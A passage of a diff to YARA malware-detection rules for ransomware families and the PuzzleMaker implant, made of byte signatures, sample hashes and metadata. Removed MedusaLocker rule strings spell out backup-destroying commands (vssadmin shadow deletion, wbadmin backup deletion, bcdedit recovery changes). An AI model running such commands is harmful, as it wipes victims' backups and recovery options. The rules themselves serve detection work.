d8 a2 17 00 48 8b cd e8 50 e1 ff ff 8b 44 24 40 83 f8 02 74 05 83 f8 17 75 0c 83 7c 24 44 01 75 05 41 b6 01 eb 03 45 32 f6 48 8b 5c 24 28 45 84 f6 74 14 f6 85 74 0e 00 00 08 74 0b 48 8b d3 48 8b ce e8 15 03 00 00 48 8b cb e8 5d f4 ff ff 45 84 f6 74 17 f7 85 74 0e 00 00 00 10 00 00 74 0b 48 8b d3 48 8b cd e8 d1 01 00 00 48 83 bd 38 07 00 00 00 74 33 b2 01 48 8b cd e8 1d f1 fe ff 48 8b 8d 40 07 00 00 45 33 c0 48 8b d3 ff 95 38 07 00 00 33 d2 48 8b cd 44 8b f0 e8 fd f0 fe ff 41 83 fe 02 75 51 41 b4 01 8b 44 24 40 83 f8 02 74 05 83 f8 17 75 5a 48 8d 4c 24 50 e8 ac 81 02 00 44 8b 44 24 40 44 8b c8 48 8b d3 48 8b ce e8 d9 f8 ff ff 8b f8 85 c0 74 37 48 8b d3 48 8b ce e8 68 eb ff ff b8 07 00 00 00 83 ff 01 0f 44 f8 } + $seq3 = { 48 8b d0 48 8d 4d 80 41 ff d4 48 8b cb ff 15 f2 fa 1e 00 48 8d 95 e0 00 00 00 48 8d 4d 80 41 ff d7 f6 47 3c 02 48 8d 8d 90 00 00 00 48 0f 44 4c 24 50 e8 f6 04 00 00 4c 8b f0 48 85 c0 0f 84 05 fe ff ff 48 8b 47 28 49 8b d6 4c 8b 0f 4c 8b 47 10 48 85 c0 74 53 48 8d 8d e0 00 00 00 48 89 4c 24 40 48 8d 0d 94 90 15 00 48 89 44 24 38 8b 47 38 89 44 24 30 48 8b 47 08 48 89 44 24 28 48 8b 44 24 58 48 89 44 24 20 e8 e0 42 fc ff 48 8b 4f 28 48 8d 15 b9 8e 15 00 48 8b d8 e8 3d 7a fd ff 85 c0 74 2a ff 47 38 eb 25 48 8d 85 e0 00 00 00 48 89 44 24 28 48 8d 0d a1 90 15 00 48 8b 44 24 58 48 89 44 24 20 e8 a2 42 fc ff 48 8b d8 49 8b ce ff 15 2e fa 1e 00 48 85 db 0f 84 68 fd ff ff 4c 8b 47 20 4d 85 c0 74 27 48 8b d3 48 8d 0d aa 90 15 00 e8 75 42 fc ff 48 8b cb 4c 8b f0 ff 15 01 fa 1e 00 4d 85 f6 0f 84 3b fd ff ff 49 8b de 4c 8b 47 30 4d 85 c0 74 27 48 8b d3 48 8d 0d 8a 90 15 00 e8 45 42 fc ff 48 8b cb 4c 8b f0 ff 15 d1 f9 1e 00 4d 85 f6 0f 84 0b fd ff ff 49 8b de f6 47 3c 02 74 27 48 8b d3 48 8d 0d 75 90 15 00 e8 18 42 fc ff 48 8b cb 48 8b f8 ff 15 a4 f9 1e 00 48 } + $seq4 = { 48 81 ec 08 03 00 00 48 8b 05 e2 61 23 00 48 33 c4 48 89 84 24 f0 02 00 00 33 d2 48 8d 8c 24 e0 00 00 00 41 b8 08 02 00 00 e8 c2 f5 16 00 41 b8 04 01 00 00 48 8d 94 24 e0 00 00 00 48 8d 0d c5 94 21 00 ff 15 07 ee 18 00 48 8d 8c 24 e0 00 00 00 ff 15 d1 ef 18 00 85 c0 74 63 33 d2 48 8d 4c 24 70 44 8d 42 68 e8 85 f5 16 00 b8 05 00 00 00 c7 44 24 70 68 00 00 00 66 89 84 24 b0 00 00 00 48 8d 8c 24 e0 00 00 00 48 8d 44 24 50 45 33 c9 48 89 44 24 48 45 33 c0 48 8d 44 24 70 33 d2 48 89 44 24 40 33 c0 48 89 44 24 38 48 89 44 24 30 89 44 24 28 89 44 24 20 ff 15 52 ed 18 00 48 8b 8c 24 f0 02 00 00 48 33 cc e8 c2 cf 16 00 48 } + $seq5 = { 48 89 74 24 48 48 8d 0d 99 5e 18 00 4c 89 74 24 50 48 8b d5 4c 89 7c 24 58 e8 5f 13 17 00 4c 8d b7 0c 08 00 00 49 63 06 85 c0 0f 84 b0 00 00 00 48 8b c8 48 c1 e1 03 ff 15 a8 5f 22 00 48 8b f0 48 85 c0 0f 84 04 01 00 00 45 33 ff ba 00 01 00 00 41 8b df 90 48 8b 07 48 85 c0 74 16 4c 39 78 28 74 08 8b cb ff c3 48 89 04 ce 48 8b 00 48 85 c0 75 ea 48 83 c7 08 48 83 ea 01 75 d8 49 63 16 4c 8d 0d ce 01 00 00 41 b8 08 00 00 00 48 8b ce e8 c0 14 17 00 85 db 74 3e 4c 8b f6 49 8b 0e e8 c1 03 00 00 48 8b f8 48 8b cd 48 85 c0 0f 84 85 00 00 00 4c 8b c0 48 8d 15 58 5a 18 00 e8 33 a8 ff ff 48 8b cf ff 15 22 5f 22 00 41 ff c7 49 83 c6 08 44 } + + condition: + uint16(0)==0x5a4d and filesize >300KB and 4 of ($seq*) +} +rule ARKBIRD_SOLG_APT_Puzzlemaker_Implant_Jun_2021_1 : FILE +{ + meta: + description = "Detect the implant of the PuzzleMaker group" + author = "Arkbird_SOLG" + id = "9387130c-4474-55bf-9736-09494a5e81b8" + date = "2021-06-10" + modified = "2021-11-01" + reference = "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-09/PuzzleMaker/APT_PuzzleMaker_Implant_Jun_2021_1.yara#L1-L21" + license_url = "N/A" + logic_hash = "e54eaaa76b2d370a27a232dee2299266f8b3b82d53da36e35c2a6fcdd7d5b1f7" + score = 75 + quality = 75 + tags = "FILE" + hash1 = "8a17279ba26c8fbe6966ea3300fdefb1adae1b3ed68f76a7fc81413bd8c1a5f6" + hash2 = "1ee9bb4e8bcabe197399b654dbf940438b120af1c376719ff9bdccf2bb1dc606" + hash3 = "f2ce2a00de8673f52d37911f3e0752b8dfab751b2a17e719a565b4083455528e" + tlp = "White" + adversary = "PuzzleMaker" + + strings: + $s1 = { 4c 8d 4c 24 5c 49 8b ce 48 8d 95 c0 00 00 00 ff 15 21 01 04 00 85 c0 74 28 4c 8d 4c 24 58 4c 89 64 24 20 41 b8 00 04 00 00 48 8d 95 c0 04 00 00 49 8b cf ff 15 b5 fe 03 00 85 c0 0f 85 25 ff ff ff ff 15 77 fe 03 00 8b } + $s2 = { 40 55 53 56 41 55 41 57 48 8d ac 24 a0 fe ff ff 48 81 ec 60 02 00 00 48 8b 05 5a 1c 03 00 48 33 c4 48 89 85 30 01 00 00 48 8b 85 b0 01 00 00 4c 8b f9 48 8b b1 b8 00 00 00 4c 8b ad c8 01 00 00 48 83 c6 07 48 89 44 24 60 48 8b 85 d0 01 00 00 48 89 45 98 8b 85 c0 01 00 00 83 c0 fd 48 c1 ee 03 4c 89 4d 80 4c 89 45 88 48 89 55 90 83 f8 06 0f 87 84 03 00 00 48 8d 15 f3 6b fd ff 48 98 8b 8c 82 b0 97 02 00 48 } + $s3 = { 48 8d 1d 98 3d 02 00 0f 57 c0 48 89 bc 24 58 02 00 00 33 c0 c7 44 24 68 01 00 00 00 0f 11 85 80 00 00 00 4c 8b c6 c7 85 8c 00 00 00 10 27 00 00 48 8d 95 a0 00 00 00 48 89 44 24 70 49 8b c9 48 89 44 24 78 0f 11 45 20 0f 11 45 30 0f 11 45 40 0f 11 45 50 0f 11 45 60 0f 11 45 70 0f 11 85 90 00 00 00 e8 57 58 fe ff 8b f8 85 c0 0f 85 62 02 00 00 49 8b 87 b8 00 00 00 48 8d 4c 24 68 48 8b 54 24 60 48 83 c0 07 48 c1 e8 03 4c 89 a4 24 50 02 00 00 4c 8b a5 b8 01 00 00 4c 3b e0 4c 89 b4 24 48 02 00 00 4d 8b f4 4c 0f 47 f0 4d 8b c6 e8 1b 57 fe ff 8b f8 85 c0 75 54 49 8b 87 b8 00 00 00 4a 8d 14 f5 00 00 00 00 48 } + $s4 = { 85 ff 0f 85 cd 01 00 00 48 8b 4d 90 48 8d 45 a0 48 89 44 24 50 45 33 c9 48 8d 45 d0 4d 8b c7 48 89 44 24 48 33 d2 4c 89 64 24 40 4c 89 64 24 38 c7 44 24 30 00 00 00 08 c7 44 24 28 01 00 00 00 4c 89 64 24 20 ff 15 62 1c 04 00 85 c0 75 3a ff 15 38 1d 04 00 44 8b c3 48 8b ce 8b d0 8b f8 e8 d1 09 00 00 48 8b 4d 80 ff 15 07 1d 04 00 48 8b 4d 88 ff 15 fd 1c 04 00 48 8b 4d 90 ff 15 f3 1c 04 00 } + $s5 = { 40 53 55 56 57 41 54 41 55 41 56 41 57 48 81 ec 28 02 00 00 48 8b 05 5d 0a 04 00 48 33 c4 48 89 84 24 10 02 00 00 48 8b ac 24 90 02 00 00 0f 57 c0 4c 8b ac 24 98 02 00 00 33 db 45 32 e4 4c 89 4c 24 58 4c 89 44 24 70 49 8b f9 48 89 6c 24 68 4d 8b c8 4c 89 6c 24 60 4c 8b fa 48 8b f1 44 8b f3 0f 11 84 24 e0 00 00 00 c7 84 24 ec 00 00 00 10 27 00 00 0f 11 84 24 80 00 00 00 0f 11 84 24 90 00 00 00 0f 11 84 24 a0 00 00 00 0f 11 84 24 b0 00 00 00 0f 11 84 24 c0 00 00 00 0f 11 84 24 d0 00 00 00 0f 11 84 24 f0 00 00 00 48 85 ed 75 47 4c 8b 81 b8 00 00 00 48 8d 05 a1 c2 ff ff 48 89 44 24 68 48 8d 8c 24 80 00 00 00 49 83 c0 07 48 8d 84 24 80 00 00 00 49 c1 e8 03 49 8b d1 48 89 44 24 60 e8 87 c2 ff ff 8b f8 85 c0 0f 85 ee 01 00 00 48 8b 7c 24 58 48 8d 56 68 48 8d 4f 18 e8 7b 4a ff ff 85 c0 75 15 48 8d 56 50 48 8b cf e8 6b 4a ff ff 85 c0 75 05 40 b5 } + $s6 = { 41 b9 01 00 00 00 c7 44 24 20 00 00 00 f0 45 33 c0 48 8d 4c 24 60 33 d2 ff 15 11 06 04 00 85 c0 74 28 48 8b 4c 24 60 4c 8d 85 b0 00 00 00 ba 20 00 00 00 ff 15 ee 05 04 00 48 8b 4c 24 60 33 d2 85 } + + condition: + uint16(0)==0x5a4d and filesize >80KB and 5 of ($s*) } -rule ARKBIRD_SOLG_RAN_Medusalocker_Aug_2021_1 : FILE +rule ARKBIRD_SOLG_APT_Puzzlemaker_Launcher_Jun_2021_1 : FILE { meta: - description = "Detect MedusaLocker ransomware" + description = "Detect the launcher of the PuzzleMaker group" author = "Arkbird_SOLG" - id = "9e647371-b37a-53af-bfb6-cde72855b564" - date = "2021-08-08" - modified = "2021-08-08" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-08/medusalocker/RAN_MedusaLocker_Aug_2021_1.yara#L1-L29" + id = "ae31d9de-8e6c-5c1b-bc45-bc4e50cea00f" + date = "2021-06-10" + modified = "2021-11-01" + reference = "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-09/PuzzleMaker/APT_PuzzleMaker_Launcher_Jun_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "40dd3ec16eefc59cb25c8855fb62cda1d642ec711226c1c964fd26384be7ef15" + logic_hash = "5c717ca5c57a86e1b5db45b3d581a45be248d45820c00c40c57a001ac07ce1b2" score = 75 - quality = 73 + quality = 75 tags = "FILE" - hash1 = "4f9a833e79092006c06203a66b41fc9250bcebcee148fea404db75d52035131c" - hash2 = "212e7f5ed4a581b4d778dfef226738c6db56b4b4006526259392d03062587887" - hash3 = "a25c0227728878c386ab6dba139976cb10e853dd3cd1eb3623f236ee8e1df212" - hash4 = "c2a0a317d73c96428ab088a8f0636ec4ccace7ca691c84ed66a83a70183f40dc" - hash5 = "0abb4a302819cdca6c9f56893ca2b52856b55a0aa68a3cb8bdcd55dcc1fad9ad" - hash6 = "f5fb7fa5231c18f0951c755c4cb0ec07b0889b5e320f42213cbf6bbbe499ad31" - tlp = "white" - adversary = "RaaS" + hash1 = "982f7c4700c75b81833d5d59ad29147c392b20c760fe36b200b541a0f841c8a9" + tlp = "White" + adversary = "PuzzleMaker" strings: - $s1 = "{8761ABBD-7F85-42EE-B272-A76179687C63}" fullword wide - $s2 = { 83 c4 08 8d 8d ?? fe ff ff e8 [2] ff ff 8d 8d ?? fe ff ff e8 [2] ff ff 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff 68 [2] 48 00 8d 8d [2] ff ff e8 [2] 00 00 8d 8d [2] ff ff 51 e8 ?? f9 ff ff 83 c4 04 88 85 2b ff ff ff 8d 8d [2] ff ff e8 [2] 00 00 0f b6 95 2b ff ff ff 85 d2 74 1e 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff 33 c0 e9 [2] 00 00 8d 4d fa e8 [2] ff ff 8d 4d fa e8 [2] 01 00 8d 4d fa e8 [2] 01 00 8d 4d fa e8 [2] 01 00 0f b6 c0 85 c0 74 0c c7 85 ?? fe ff ff [2] 48 00 eb 0a c7 85 ?? fe ff ff [2] 48 00 8b 8d ?? fe ff ff 89 8d ?? fe ff ff 8d 95 ?? fe ff ff 52 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff e8 ?? f8 ff ff 8d 4d 8c e8 [2] 00 00 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff b9 [2] 4a 00 e8 [2] ff ff 50 e8 [2] ff ff 83 c4 04 50 8d 4d 8c e8 [2] 00 00 0f b6 c0 85 c0 75 41 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff e8 ?? c6 ff ff c7 85 ?? fe ff ff 00 00 00 00 8d 4d 8c e8 [2] 00 00 8d 4d fa e8 [2] ff ff 8b 85 ?? fe ff ff e9 [2] 00 00 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff 68 [2] 48 00 8d 8d ?? fe ff ff e8 [2] 00 00 8d 8d ?? fd ff ff 51 8d 4d 8c e8 [2] 00 00 50 e8 [2] ff ff 83 c4 04 50 8d 95 ?? fe ff ff 52 b9 [2] 4a 00 e8 [2] 00 00 0f b6 c0 85 c0 75 0c c7 85 ?? fe ff ff 01 00 00 00 eb 0a c7 85 ?? fe ff ff 00 00 00 00 8a 8d ?? fe ff ff 88 8d 2a ff ff ff 8d 8d ?? fd ff ff e8 [2] 00 00 8d 8d ?? fe ff ff } - $s3 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 62 00 6f 00 6f 00 74 00 73 00 74 00 61 00 74 00 75 00 73 00 70 00 6f 00 6c 00 69 00 63 00 79 00 20 00 69 00 67 00 6e 00 6f 00 72 00 65 00 61 00 6c 00 6c 00 66 00 61 00 69 00 6c 00 75 00 72 00 65 00 73 } - $s4 = { 42 67 49 41 41 41 43 6b 41 41 42 53 55 30 45 78 } - $s5 = "wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest" fullword wide - $s6 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 72 00 65 00 63 00 6f 00 76 00 65 00 72 00 79 00 65 00 6e 00 61 00 62 00 6c 00 65 00 64 00 20 00 4e 00 6f } - $s7 = { 76 00 73 00 73 00 61 00 64 00 6d 00 69 00 6e 00 2e 00 65 00 78 00 65 00 20 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 53 00 68 00 61 00 64 00 6f 00 77 00 73 00 20 00 2f 00 41 00 6c 00 6c 00 20 00 2f 00 51 00 75 00 69 00 65 00 74 } - $s8 = { 77 00 6d 00 69 00 63 00 2e 00 65 00 78 00 65 00 20 00 53 00 48 00 41 00 44 00 4f 00 57 00 43 00 4f 00 50 00 59 00 20 00 2f 00 6e 00 6f 00 69 00 6e 00 74 00 65 00 72 00 61 00 63 00 74 00 69 00 76 00 65 } - $s9 = { 77 00 62 00 61 00 64 00 6d 00 69 00 6e 00 20 00 44 00 45 00 4c 00 45 00 54 00 45 00 20 00 53 00 59 00 53 00 54 00 45 00 4d 00 53 00 54 00 41 00 54 00 45 00 42 00 41 00 43 00 4b 00 55 00 50 } - $s10 = { 33 c0 48 89 44 24 40 48 c7 44 24 48 07 00 00 00 66 89 44 24 30 44 8d 40 26 48 8d 15 [2] 09 00 48 8d 4c 24 30 e8 [2] ff ff 48 83 7c 24 40 00 74 42 4c 8d 44 24 30 48 83 7c 24 48 08 4c 0f 43 44 24 30 33 d2 b9 01 00 1f 00 ff 15 [2] 07 00 48 85 c0 75 1f 4c 8d 44 24 30 48 83 7c 24 48 08 4c 0f 43 44 24 30 33 d2 33 c9 ff 15 [2] 07 00 32 db eb 02 b3 01 48 8b 54 24 48 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4c 24 30 48 8b c1 48 81 fa 00 10 00 00 72 19 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 0f 87 d3 00 00 00 e8 [2] 03 00 84 db 0f 85 ad 00 00 00 e8 3e 36 00 00 84 c0 75 05 e8 c5 36 00 00 e8 ?? 94 ff ff 48 8d 1d [2] 0d 00 48 8d 4c 24 30 e8 [2] ff ff 48 8b f8 48 8d 35 [2] 0d 00 0f 1f } + $s1 = { 4c 89 6d bf 48 8d 45 bf 48 89 44 24 20 4c 8d 0d f9 45 01 00 33 d2 44 8d 42 01 48 8d 0d dc 45 01 00 ff 15 56 44 01 00 8b d8 85 c0 78 c6 4c 89 6d c7 48 8b 45 bf 48 8b 08 4c 8b 79 18 b9 18 00 00 00 e8 9b 04 00 00 48 8b d8 48 89 45 a7 48 85 c0 74 32 0f 57 c0 33 c0 0f 11 03 48 89 43 10 4c 89 6b 08 c7 43 10 01 00 00 00 48 8d 0d 15 fb 01 00 ff 15 cf 43 01 00 48 89 03 48 85 } + $s2 = { 44 89 6c 24 38 4c 89 6c 24 30 c7 44 24 28 03 00 00 00 c7 44 24 20 03 00 00 00 45 33 c9 45 33 c0 41 8d 51 0a 48 8b 4d c7 ff 15 f6 42 01 00 85 c0 0f 88 bb 01 00 00 48 8d 0d 1d fa 01 00 ff 15 c1 42 01 00 4c 8b f8 48 8d 0d 1b fa 01 00 ff 15 b1 42 01 00 4c 8b e0 4c 89 6d df 48 8b 4d c7 48 8b 11 4c 8b 52 30 4c 89 6c 24 28 48 8d 45 df 48 89 44 24 20 45 33 c9 45 33 c0 49 8b d4 41 ff d2 4c 89 6d e7 48 8b 4d df 48 8b 01 4c 89 6c 24 20 4c 8d 4d e7 45 33 c0 49 8b d7 ff 90 98 00 00 00 4c 89 6d cf 48 8b 4d e7 48 8b 01 4c 8d 45 cf 33 d2 ff 50 78 b8 08 00 00 00 66 89 45 ef 8d 48 10 e8 dc 02 00 00 48 8b d8 48 89 45 a7 48 85 c0 74 33 0f 57 c0 33 c0 0f 11 03 48 89 43 10 4c 89 6b 08 c7 43 10 01 00 00 00 48 8b ce ff 15 14 42 01 00 48 89 03 48 85 c0 75 0e 48 85 } + $s3 = { 4c 8d 05 75 0e 02 00 0f 1f 40 00 66 0f 1f 84 00 00 00 00 00 0f b6 d0 42 0f b6 0c 12 66 41 31 08 74 12 ff c0 49 83 c0 02 83 f8 20 72 e7 0f 1f 80 00 00 00 00 0f b7 05 49 09 02 00 48 8d 0d 76 09 02 00 66 d1 e8 66 83 e0 7f 66 0f 6f 15 f3 d4 01 00 66 89 05 2c 09 02 00 0f b7 05 27 09 02 00 66 d1 e8 66 83 e0 7f 66 89 05 19 09 02 00 0f b7 05 14 09 02 00 66 d1 e8 66 83 e0 7f 66 89 05 06 09 02 00 0f b7 05 01 09 02 00 66 d1 e8 66 83 e0 7f 66 89 05 f3 08 02 00 0f b7 05 ee 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 e0 08 02 00 0f b7 05 db 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 cd 08 02 00 0f b7 05 c8 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 ba 08 02 00 0f b7 05 b5 08 02 00 66 d1 e8 66 83 e0 7f f3 0f 6f 05 bc 08 02 00 66 89 05 9f 08 02 00 0f b7 05 9a 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 8c 08 02 00 0f b7 05 87 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 79 08 02 00 0f b7 05 74 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 66 08 02 00 0f b7 05 61 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 53 08 02 00 0f b7 05 4e 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 40 08 02 00 0f b7 05 3b 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 2d 08 02 00 0f b7 05 28 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 1a 08 02 00 0f b7 05 15 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 07 08 02 00 0f b7 05 02 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 f4 07 02 00 0f b7 05 ef 07 02 00 66 d1 e8 66 83 e0 7f 66 89 05 e1 07 02 00 b8 01 00 00 00 66 0f 6e c8 8d 50 05 66 0f d1 c1 66 0f db c2 f3 0f 7f 05 c7 07 02 00 0f } + $s4 = { 48 89 9c 24 60 06 00 00 48 89 b4 24 68 06 00 00 48 89 bc 24 70 06 00 00 4c 89 b4 24 30 06 00 00 c7 05 2e 1a 02 00 04 00 00 00 48 c7 05 27 1a 02 00 01 00 00 00 4c 89 2d 2c 1a 02 00 ff 15 22 48 01 00 48 8d 35 8b 04 02 00 66 66 66 0f 1f 84 00 00 00 00 00 33 d2 44 89 6c 24 70 41 b8 08 03 00 00 48 8d 8d 10 02 00 00 45 8b f5 e8 e4 28 00 00 4c 8d 0d 5d 03 02 00 48 89 74 24 20 ba 84 01 00 00 48 8d 8d 10 02 00 00 49 c7 c0 ff ff ff ff e8 a0 fb ff ff 48 8d 54 24 70 48 8d 8d 10 02 00 00 e8 9f 05 00 00 8b d0 85 } + $s5 = { 4c 89 6c 24 60 4c 8d 05 25 cc 01 00 4c 89 6c 24 58 48 8d 15 e1 04 02 00 4c 89 6c 24 50 41 b9 ff 01 0f 00 4c 89 6c 24 48 48 8b cf 4c 89 6c 24 40 48 89 74 24 38 44 89 6c 24 30 c7 44 24 28 02 00 00 00 c7 44 24 20 10 00 00 00 ff 15 19 46 01 00 48 8b d8 ff 15 a8 46 01 00 8b f0 48 85 db 74 22 48 8b cb ff 15 20 46 01 00 48 8b cb ff 15 ff 45 01 00 48 8b cf ff 15 f6 45 01 00 bf 01 00 00 } + $s6 = { 33 d2 33 c9 41 b8 3f 00 0f 00 ff 15 f4 46 01 00 48 8b f8 48 85 } condition: - uint16(0)==0x5A4D and filesize >150KB and 9 of ($s*) + uint16(0)==0x5a4d and filesize >80KB and 5 of ($s*) } -rule ARKBIRD_SOLG_Ran_Loader_Hades_Dec_2020_1 : FILE +rule ARKBIRD_SOLG_Exp_CVE_2021_40444_Sep_2021_1 : FILE { meta: - description = "Detect the loader used by Hades ransomware for load the final implant in memory" + description = "Detect the maldocs with a structure like used for CVE_2021_40444 exploit" author = "Arkbird_SOLG" - id = "d48d3a2b-3f0f-5da2-aba9-db2366489a6c" - date = "2020-12-27" - modified = "2021-01-01" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-01-01/Hades/Ran_Loader_Hades_Dec_2020_1.yar#L2-L24" + id = "acaba73d-f744-5d3f-9617-e976832f3577" + date = "2021-09-09" + modified = "2021-09-09" + reference = "https://github.com/StrangerealIntel/DailyIOC" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-09/Exp_CVE_2021_40444_Sep_2021_1.yara#L2-L20" license_url = "N/A" - logic_hash = "cfa0f8acd3c526f7f4889794f7c38547a88031bb615a03ad5c1542c61bc0eecd" + logic_hash = "ba1b256c9caad3371d57e6ecbe54721038c819c7c081edf2443523109c25b184" score = 50 - quality = 71 + quality = 75 tags = "FILE" - hash1 = "0dfcf4d5f66310de87c2e422d7804e66279fe3e3cd6a27723225aecf214e9b00" - hash2 = "ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d" - level = "Experimental" + reference1 = "-" + hash1 = "199b9e9a7533431731fbb08ff19d437de1de6533f3ebbffc1e13eeffaa4fd455" + hash2 = "3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf" + hash3 = "5b85dbe49b8bc1e65e01414a0508329dc41dc13c92c08a4f14c71e3044b06185" + hash4 = "938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52" + tlp = "White" + level = "experimental" + adversary = "-" strings: - $seq1 = { 48 83 ec 58 8b 0d 9e aa 1c 00 ba 01 14 00 00 ff 15 93 9a 1c 00 48 85 c0 74 07 33 c0 e9 c1 3b 00 00 48 8b 05 58 99 1c 00 48 89 44 24 30 c7 44 24 3c 2c 01 00 00 c7 44 24 38 01 00 00 00 33 c9 ff 15 cb 99 1c 00 48 89 05 74 aa 1c 00 48 8b 05 6d aa 1c 00 48 63 48 3c 48 8b 05 62 aa 1c 00 48 03 c1 48 89 05 88 aa 1c 00 48 8d 44 24 3c 48 89 44 24 28 48 8d 05 a7 aa 1c 00 48 89 44 24 20 4c 8d 4c 24 38 45 33 c0 48 8d 15 53 aa 1c 00 48 8b 0d e4 ac 1c 00 ff 54 24 30 48 85 c0 74 05 e8 5e ff ff ff 48 8d 05 2d 3d 00 00 48 89 05 38 aa 1c 00 48 8b 05 31 aa 1c 00 } - $seq2 = { 89 54 24 10 89 4c 24 08 48 83 ec 18 8b 44 24 20 89 04 24 8b 44 24 28 89 44 24 04 8b 44 24 04 39 04 24 73 0f c7 44 24 20 04 00 00 00 8b 04 24 eb 0e eb 0c c7 44 24 20 35 00 00 00 8b 44 24 04 48 83 c4 18 } - $seq3 = { 48 8b 05 c1 ?? 1c 00 48 89 05 32 ?? 1c 00 } - $s1 = "111111111\\{aa5b6a80-b834-11d0-932f-00a0c90dcaa9}" fullword wide - $s2 = "_VERSION_INFO" fullword wide - $s3 = "VkKeyScanW" fullword ascii - $s4 = { 53 43 61 4d 69 72 } + $x1 = { 2f 5f 72 65 6c 73 2f 64 6f 63 75 6d 65 6e 74 2e 78 6d 6c 2e 72 65 6c 73 55 54 09 00 03 [3] 61 [3] 61 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 ?? 94 ?? 4e c2 [3] ef 4d 7c 87 } + $x2 = { 77 6d 66 55 54 09 00 03 00 a6 ce 12 00 a6 ce 12 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 bb 7e f6 d8 2c 06 38 48 00 93 85 e1 8c 0c 9c 0c 0c cc 52 60 1e 2b 98 64 01 62 66 46 0e 30 8f 9b 09 26 ce 03 66 31 83 55 00 00 50 4b 03 04 ?? 00 00 00 ?? 00 [10] 00 00 [2] 00 00 ?? 00 1c 00 } condition: - uint16(0)==0x5a4d and filesize >300KB and 2 of ($seq*) and 3 of ($s*) + uint16(0)==0x4B50 and filesize >5KB and all of ($x*) } -rule ARKBIRD_SOLG_RAN_ALPHV_Dec_2021_1 : FILE +rule ARKBIRD_SOLG_Ran_Egregor_Oct_2020_1 : FILE { meta: - description = "Detect AlphV ransomware (Nov and Dec 2021)" + description = "Detect Egregor / Maze ransomware by Maze blocks" author = "Arkbird_SOLG" - id = "5c758dc9-b1dc-58e0-b443-6f78e27ffefe" - date = "2021-12-09" - modified = "2021-12-18" + id = "03d3ee25-cd0c-573e-beca-e4ff4377da9f" + date = "2020-10-29" + modified = "2023-11-22" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-09/RAN_ALPHV_Dec_2021_1.yara#L1-L21" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-31/Ran_Egregor_Oct_2020_1 .yar#L1-L21" license_url = "N/A" - logic_hash = "416ebea98f660dd9fad27c3be0c79e47bc69e08fe4be7db76a71462d2c5ada49" + logic_hash = "d7d03db002b74d031b725db60e38a46abce564fb090b013aa9ec66376b430000" score = 75 quality = 75 tags = "FILE" - hash1 = "3d7cf20ca6476e14e0a026f9bdd8ff1f26995cdc5854c3adb41a6135ef11ba83" - hash2 = "7e363b5f1ba373782261713fa99e8bbc35ddda97e48799c4eb28f17989da8d8e" - hash3 = "cefea76dfdbb48cfe1a3db2c8df34e898e29bec9b2c13e79ef40655c637833ae" - hash4 = "731adcf2d7fb61a8335e23dbee2436249e5d5753977ec465754c6b699e9bf161" - tlp = "white" - adversary = "BlackCat" + hash1 = "14e547bebaa738b8605ba4182c4379317d121e268f846c0ed3da171375e65fe4" + hash2 = "af538ab1b8bdfbf5b7f1548d72c0d042eb14d0011d796cab266f0671720abb4d" + hash3 = "42ac07c5175d88d6528cfe3dceacd01834323f10c4af98b1a190d5af7a7bb1cb" + hash4 = "4139c96d16875d1c3d12c27086775437b26d3c0ebdcdc258fb012d23b9ef8345" strings: - $s1 = { ff b4 24 [2] 00 00 6a 00 ff 35 ?? e1 ?? 00 e8 [3] 00 8d 8c 24 